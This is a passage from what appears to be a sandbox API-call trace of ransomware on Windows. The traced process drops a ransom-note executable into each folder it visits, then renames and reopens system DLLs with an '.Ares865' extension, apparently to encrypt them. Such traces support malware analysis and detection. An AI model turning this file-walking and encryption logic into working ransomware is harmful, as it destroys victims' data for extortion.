back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0147.074] GetLastError () returned 0x0 [0147.074] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0147.074] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0147.074] CloseHandle (hObject=0x120) returned 1 [0147.074] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0147.074] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0147.074] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x534bf800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x534bf800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0147.074] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0147.074] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0147.074] lstrcpyW (in: lpString1=0x2cce46a, lpString2="msader15.dll.mui" | out: lpString1="msader15.dll.mui") returned="msader15.dll.mui" [0147.075] lstrlenW (lpString="msader15.dll.mui") returned 16 [0147.075] lstrlenW (lpString="Ares865") returned 7 [0147.075] lstrcmpiW (lpString1="dll.mui", lpString2="Ares865") returned 1 [0147.075] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US\\msader15.dll.mui.Ares865") returned 77 [0147.075] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\en-us\\msader15.dll.mui"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US\\msader15.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\en-us\\msader15.dll.mui.ares865"), dwFlags=0x1) returned 1 [0147.076] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US\\msader15.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\en-us\\msader15.dll.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0147.076] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17408) returned 1 [0147.077] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0147.077] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0147.077] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0147.080] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\SpeechEngines", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\SpeechEngines") returned="C:\\Program Files (x86)\\Common Files\\SpeechEngines" [0147.080] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0147.080] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7968 | out: hHeap=0x2b0000) returned 1 [0147.080] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\SpeechEngines") returned 49 [0147.080] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\SpeechEngines" | out: lpString1="C:\\Program Files (x86)\\Common Files\\SpeechEngines") returned="C:\\Program Files (x86)\\Common Files\\SpeechEngines" [0147.080] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0147.080] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\speechengines\\how to back your files.exe"), bFailIfExists=1) returned 0 [0147.081] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0147.081] GetLastError () returned 0x0 [0147.082] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0147.082] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0147.082] CloseHandle (hObject=0x120) returned 1 [0147.082] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0147.082] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0147.082] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x534bf800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x534bf800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0147.082] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0147.082] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0147.082] lstrcpyW (in: lpString1=0x2cce464, lpString2="Microsoft" | out: lpString1="Microsoft") returned="Microsoft" [0147.082] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7968 [0147.082] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x78) returned 0x2c1708 [0147.082] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7970 | out: ListHead=0x2e7710, ListEntry=0x2e7970) returned 0x2e7950 [0147.082] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x534e5960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x534e5960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0147.082] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0147.082] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7970 [0147.082] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft") returned="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft" [0147.082] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1708 | out: hHeap=0x2b0000) returned 1 [0147.083] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7968 | out: hHeap=0x2b0000) returned 1 [0147.083] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft") returned 59 [0147.083] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft" | out: lpString1="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft") returned="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft" [0147.083] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0147.083] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\how to back your files.exe"), bFailIfExists=1) returned 0 [0147.083] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0147.084] GetLastError () returned 0x0 [0147.084] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0147.084] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0147.084] CloseHandle (hObject=0x120) returned 1 [0147.084] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0147.084] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0147.084] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x534e5960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x534e5960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0147.084] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0147.084] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0147.084] lstrcpyW (in: lpString1=0x2cce478, lpString2="TTS20" | out: lpString1="TTS20") returned="TTS20" [0147.085] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7968 [0147.085] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x84) returned 0x2e95b0 [0147.085] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7970 | out: ListHead=0x2e7710, ListEntry=0x2e7970) returned 0x2e7950 [0147.085] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd8f7490, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd8f7490, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TTS20", cAlternateFileName="")) returned 0 [0147.085] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0147.085] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7970 [0147.085] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20") returned="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20" [0147.085] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0147.085] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7968 | out: hHeap=0x2b0000) returned 1 [0147.085] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20") returned 65 [0147.085] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20" | out: lpString1="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20") returned="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20" [0147.085] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0147.085] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\how to back your files.exe"), bFailIfExists=1) returned 0 [0147.086] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0147.087] GetLastError () returned 0x0 [0147.087] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0147.087] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0147.087] CloseHandle (hObject=0x120) returned 1 [0147.087] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0147.087] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0147.087] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd8f7490, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd8f7490, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0147.087] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0147.087] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0147.087] lstrcpyW (in: lpString1=0x2cce484, lpString2="en-US" | out: lpString1="en-US") returned="en-US" [0147.087] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7968 [0147.087] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x90) returned 0x336fc8 [0147.087] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7970 | out: ListHead=0x2e7710, ListEntry=0x2e7970) returned 0x2e7950 [0147.087] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7523740, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xf7523740, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x9f416c90, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x8a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSTTSCommon.dll", cAlternateFileName="")) returned 1 [0147.087] lstrcmpiW (lpString1="MSTTSCommon.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0147.087] lstrcmpiW (lpString1="MSTTSCommon.dll", lpString2="aoldtz.exe") returned 1 [0147.088] lstrcpyW (in: lpString1=0x2cce484, lpString2="MSTTSCommon.dll" | out: lpString1="MSTTSCommon.dll") returned="MSTTSCommon.dll" [0147.088] lstrlenW (lpString="MSTTSCommon.dll") returned 15 [0147.088] lstrlenW (lpString="Ares865") returned 7 [0147.088] lstrcmpiW (lpString1="mon.dll", lpString2="Ares865") returned 1 [0147.088] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSCommon.dll.Ares865") returned 89 [0147.088] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSCommon.dll" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\msttscommon.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSCommon.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\msttscommon.dll.ares865"), dwFlags=0x1) returned 1 [0147.090] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSCommon.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\msttscommon.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0147.090] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=35328) returned 1 [0147.090] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0147.090] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0147.090] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0147.095] lstrcpyW (in: lpString1=0x2cce484, lpString2="MSTTSDecWrp.dll" | out: lpString1="MSTTSDecWrp.dll") returned="MSTTSDecWrp.dll" [0147.095] lstrlenW (lpString="MSTTSDecWrp.dll") returned 15 [0147.095] lstrlenW (lpString="Ares865") returned 7 [0147.095] lstrcmpiW (lpString1="Wrp.dll", lpString2="Ares865") returned 1 [0147.095] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSDecWrp.dll.Ares865") returned 89 [0147.095] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSDecWrp.dll" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\msttsdecwrp.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSDecWrp.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\msttsdecwrp.dll.ares865"), dwFlags=0x1) returned 1 [0147.097] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSDecWrp.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\msttsdecwrp.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0147.097] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=47616) returned 1 [0147.097] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0147.097] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0147.097] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0147.102] lstrcpyW (in: lpString1=0x2cce484, lpString2="MSTTSEngine.dll" | out: lpString1="MSTTSEngine.dll") returned="MSTTSEngine.dll" [0147.102] lstrlenW (lpString="MSTTSEngine.dll") returned 15 [0147.102] lstrlenW (lpString="Ares865") returned 7 [0147.102] lstrcmpiW (lpString1="ine.dll", lpString2="Ares865") returned 1 [0147.102] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSEngine.dll.Ares865") returned 89 [0147.102] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSEngine.dll" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\msttsengine.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSEngine.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\msttsengine.dll.ares865"), dwFlags=0x1) returned 1 [0147.104] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSEngine.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\msttsengine.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0147.104] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=150528) returned 1 [0147.104] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0147.104] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0147.104] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0147.118] lstrcpyW (in: lpString1=0x2cce484, lpString2="MSTTSLoc.dll" | out: lpString1="MSTTSLoc.dll") returned="MSTTSLoc.dll" [0147.118] lstrlenW (lpString="MSTTSLoc.dll") returned 12 [0147.118] lstrlenW (lpString="Ares865") returned 7 [0147.118] lstrcmpiW (lpString1="Loc.dll", lpString2="Ares865") returned 1 [0147.119] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSLoc.dll.Ares865") returned 86 [0147.119] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSLoc.dll" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\msttsloc.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSLoc.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\msttsloc.dll.ares865"), dwFlags=0x1) returned 1 [0147.121] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSLoc.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\msttsloc.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0147.121] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8704) returned 1 [0147.121] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0147.122] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0147.122] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0147.126] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US") returned="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US" [0147.126] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fc8 | out: hHeap=0x2b0000) returned 1 [0147.126] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7968 | out: hHeap=0x2b0000) returned 1 [0147.126] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US") returned 71 [0147.126] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US" | out: lpString1="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US") returned="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US" [0147.126] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0147.126] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0147.127] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0147.128] GetLastError () returned 0x0 [0147.128] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0147.128] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0147.128] CloseHandle (hObject=0x120) returned 1 [0147.128] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0147.128] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0147.128] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, 